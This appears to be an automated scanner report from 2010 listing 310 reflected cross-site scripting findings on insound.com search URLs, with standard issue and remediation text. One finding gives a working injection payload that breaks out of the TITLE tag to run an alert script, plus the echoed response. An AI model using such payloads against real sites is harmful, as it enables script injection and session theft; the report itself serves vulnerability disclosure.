insound.com | CWE-79 | XSS | Hoyt LLC Research

Cross Site Scripting, XSS, Vulnerability Crawler

Report generated by XSS.CX at Thu Dec 09 21:41:26 CST 2010.


Cross Site Scripting Report | insound.com

1. Cross-site scripting (reflected)

1.1. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]

1.2. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]

1.3. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]

1.4. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]

1.5. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]

1.6. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]

1.7. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]

1.8. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]

1.9. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]

1.10. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]

1.11. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]

1.12. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]

1.13. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]

1.14. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]

1.15. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]

1.16. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]

1.17. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]

1.18. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]

1.19. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]

1.20. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]

1.21. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]

1.22. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]

1.23. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]

1.24. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]

1.25. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]

1.26. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]

1.27. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]

1.28. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]

1.29. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]

1.30. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]

1.31. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]

1.32. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]

1.33. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]

1.34. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]

1.35. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]

1.36. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]

1.37. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]

1.38. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]

1.39. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]

1.40. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]

1.41. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]

1.42. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]

1.43. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]

1.44. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]

1.45. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]

1.46. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]

1.47. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]

1.48. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]

1.49. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]

1.50. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]

1.51. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]

1.52. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]

1.53. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]

1.54. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]

1.55. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]

1.56. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]

1.57. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]

1.58. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]

1.59. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]

1.60. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]

1.61. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]

1.62. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]

1.63. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]

1.64. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]

1.65. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]

1.66. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]

1.67. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]

1.68. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]

1.69. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]

1.70. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]

1.71. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]

1.72. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]

1.73. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]

1.74. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]

1.75. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]

1.76. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]

1.77. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]

1.78. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]

1.79. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]

1.80. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]

1.81. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]

1.82. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]

1.83. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]

1.84. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]

1.85. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]

1.86. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]

1.87. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]

1.88. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]

1.89. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]

1.90. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]

1.91. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]

1.92. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]

1.93. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]

1.94. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]

1.95. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]

1.96. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]

1.97. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]

1.98. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]

1.99. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]

1.100. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]

1.101. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]

1.102. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]

1.103. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]

1.104. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]

1.105. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]

1.106. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]

1.107. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]

1.108. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]

1.109. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]

1.110. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]

1.111. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]

1.112. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]

1.113. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]

1.114. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]

1.115. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]

1.116. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]

1.117. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]

1.118. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]

1.119. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]

1.120. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]

1.121. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]

1.122. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]

1.123. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]

1.124. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]

1.125. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]

1.126. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]

1.127. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]

1.128. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]

1.129. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]

1.130. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]

1.131. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]

1.132. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]

1.133. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]

1.134. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]

1.135. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]

1.136. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]

1.137. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]

1.138. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]

1.139. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]

1.140. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]

1.141. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]

1.142. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]

1.143. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]

1.144. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]

1.145. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]

1.146. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]

1.147. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]

1.148. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]

1.149. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]

1.150. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]

1.151. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]

1.152. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]

1.153. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]

1.154. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]

1.155. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]

1.156. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]

1.157. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]

1.158. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]

1.159. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]

1.160. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]

1.161. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]

1.162. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]

1.163. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]

1.164. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]

1.165. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]

1.166. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]

1.167. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]

1.168. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]

1.169. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]

1.170. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]

1.171. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]

1.172. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]

1.173. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]

1.174. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]

1.175. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]

1.176. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]

1.177. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]

1.178. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]

1.179. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]

1.180. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]

1.181. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]

1.182. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]

1.183. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]

1.184. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]

1.185. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]

1.186. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]

1.187. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]

1.188. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]

1.189. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]

1.190. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]

1.191. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]

1.192. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]

1.193. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]

1.194. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]

1.195. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]

1.196. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]

1.197. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]

1.198. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]

1.199. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]

1.200. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]

1.201. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]

1.202. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]

1.203. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]

1.204. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]

1.205. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]

1.206. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]

1.207. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]

1.208. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]

1.209. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]

1.210. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]

1.211. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]

1.212. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]

1.213. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]

1.214. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]

1.215. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]

1.216. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]

1.217. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]

1.218. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]

1.219. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]

1.220. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]

1.221. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]

1.222. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]

1.223. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]

1.224. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]

1.225. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]

1.226. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]

1.227. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]

1.228. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]

1.229. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]

1.230. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]

1.231. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]

1.232. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]

1.233. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]

1.234. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]

1.235. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]

1.236. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]

1.237. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]

1.238. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]

1.239. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]

1.240. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]

1.241. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]

1.242. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]

1.243. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]

1.244. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]

1.245. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]

1.246. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]

1.247. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]

1.248. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]

1.249. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]

1.250. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]

1.251. http://www.insound.com/search/query/Robert%20Wyatt&from=47597/ [REST URL parameter 3]

1.252. http://www.insound.com/search/query/Robert%20Wyatt&from=47597/ [REST URL parameter 3]

1.253. http://www.insound.com/search/query/Robyn&from=47597/ [REST URL parameter 3]

1.254. http://www.insound.com/search/query/Robyn&from=47597/ [REST URL parameter 3]

1.255. http://www.insound.com/search/query/Shit%20Robot&from=47597/ [REST URL parameter 3]

1.256. http://www.insound.com/search/query/Shit%20Robot&from=47597/ [REST URL parameter 3]

1.257. http://www.insound.com/search/query/Simian%20Mobile%20Disco&from=47597/ [REST URL parameter 3]

1.258. http://www.insound.com/search/query/Simian%20Mobile%20Disco&from=47597/ [REST URL parameter 3]

1.259. http://www.insound.com/search/query/Soft%20Circle&from=47597/ [REST URL parameter 3]

1.260. http://www.insound.com/search/query/Soft%20Circle&from=47597/ [REST URL parameter 3]

1.261. http://www.insound.com/search/query/Spectrals&from=47597/ [REST URL parameter 3]

1.262. http://www.insound.com/search/query/Spectrals&from=47597/ [REST URL parameter 3]

1.263. http://www.insound.com/search/query/Spoon&from=47597/ [REST URL parameter 3]

1.264. http://www.insound.com/search/query/Spoon&from=47597/ [REST URL parameter 3]

1.265. http://www.insound.com/search/query/Sufjan%20Stevens&from=47597/ [REST URL parameter 3]

1.266. http://www.insound.com/search/query/Sufjan%20Stevens&from=47597/ [REST URL parameter 3]

1.267. http://www.insound.com/search/query/Super%20Wild%20Horses&from=47597/ [REST URL parameter 3]

1.268. http://www.insound.com/search/query/Super%20Wild%20Horses&from=47597/ [REST URL parameter 3]

1.269. http://www.insound.com/search/query/Tanlines&from=47597/ [REST URL parameter 3]

1.270. http://www.insound.com/search/query/Tanlines&from=47597/ [REST URL parameter 3]

1.271. http://www.insound.com/search/query/Telekinesis&from=47597/ [REST URL parameter 3]

1.272. http://www.insound.com/search/query/Telekinesis&from=47597/ [REST URL parameter 3]

1.273. http://www.insound.com/search/query/Tennis&from=47597/ [REST URL parameter 3]

1.274. http://www.insound.com/search/query/Tennis&from=47597/ [REST URL parameter 3]

1.275. http://www.insound.com/search/query/The%20Bug&from=47597/ [REST URL parameter 3]

1.276. http://www.insound.com/search/query/The%20Bug&from=47597/ [REST URL parameter 3]

1.277. http://www.insound.com/search/query/The%20Cannabinoids&from=47597/ [REST URL parameter 3]

1.278. http://www.insound.com/search/query/The%20Cannabinoids&from=47597/ [REST URL parameter 3]

1.279. http://www.insound.com/search/query/The%20Cannanes&from=47597/ [REST URL parameter 3]

1.280. http://www.insound.com/search/query/The%20Cannanes&from=47597/ [REST URL parameter 3]

1.281. http://www.insound.com/search/query/The%20Cannonball%20Adderley%20Quintet&from=47597/ [REST URL parameter 3]

1.282. http://www.insound.com/search/query/The%20Cannonball%20Adderley%20Quintet&from=47597/ [REST URL parameter 3]

1.283. http://www.insound.com/search/query/The%20Cansecos&from=47597/ [REST URL parameter 3]

1.284. http://www.insound.com/search/query/The%20Cansecos&from=47597/ [REST URL parameter 3]

1.285. http://www.insound.com/search/query/The%20Capes&from=47597/ [REST URL parameter 3]

1.286. http://www.insound.com/search/query/The%20Capes&from=47597/ [REST URL parameter 3]

1.287. http://www.insound.com/search/query/The%20Capitol%20Years&from=47597/ [REST URL parameter 3]

1.288. http://www.insound.com/search/query/The%20Capitol%20Years&from=47597/ [REST URL parameter 3]

1.289. http://www.insound.com/search/query/The%20Capstan%20Shafts&from=47597/ [REST URL parameter 3]

1.290. http://www.insound.com/search/query/The%20Capstan%20Shafts&from=47597/ [REST URL parameter 3]

1.291. http://www.insound.com/search/query/The%20Drums&from=47597/ [REST URL parameter 3]

1.292. http://www.insound.com/search/query/The%20Drums&from=47597/ [REST URL parameter 3]

1.293. http://www.insound.com/search/query/The%20Mountain%20Goats&from=47597/ [REST URL parameter 3]

1.294. http://www.insound.com/search/query/The%20Mountain%20Goats&from=47597/ [REST URL parameter 3]

1.295. http://www.insound.com/search/query/The%20National%20Lights&from=47597/ [REST URL parameter 3]

1.296. http://www.insound.com/search/query/The%20National%20Lights&from=47597/ [REST URL parameter 3]

1.297. http://www.insound.com/search/query/The%20National%20Trust&from=47597/ [REST URL parameter 3]

1.298. http://www.insound.com/search/query/The%20National%20Trust&from=47597/ [REST URL parameter 3]

1.299. http://www.insound.com/search/query/The%20National&from=47597/ [REST URL parameter 3]

1.300. http://www.insound.com/search/query/The%20National&from=47597/ [REST URL parameter 3]

1.301. http://www.insound.com/search/query/The%20Soft%20Boys&from=47597/ [REST URL parameter 3]

1.302. http://www.insound.com/search/query/The%20Soft%20Boys&from=47597/ [REST URL parameter 3]

1.303. http://www.insound.com/search/query/The%20War%20on%20Drugs&from=47597/ [REST URL parameter 3]

1.304. http://www.insound.com/search/query/The%20War%20on%20Drugs&from=47597/ [REST URL parameter 3]

1.305. http://www.insound.com/search/query/Trans%20Am&from=47597/ [REST URL parameter 3]

1.306. http://www.insound.com/search/query/Trans%20Am&from=47597/ [REST URL parameter 3]

1.307. http://www.insound.com/search/query/Twin%20Shadow&from=47597/ [REST URL parameter 3]

1.308. http://www.insound.com/search/query/Twin%20Shadow&from=47597/ [REST URL parameter 3]

1.309. http://www.insound.com/search/query/Wise%20Blood&from=47597/ [REST URL parameter 3]

1.310. http://www.insound.com/search/query/Wise%20Blood&from=47597/ [REST URL parameter 3]

2. Cookie scoped to parent domain

3. Cookie without HttpOnly flag set

4. Cross-domain script include



1. Cross-site scripting (reflected)
There are 310 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Agalloch&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f2346%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17419aa4d55 was submitted in the REST URL parameter 3. This input was echoed as f2346</title><script>alert(1)</script>17419aa4d55 in the application's response.

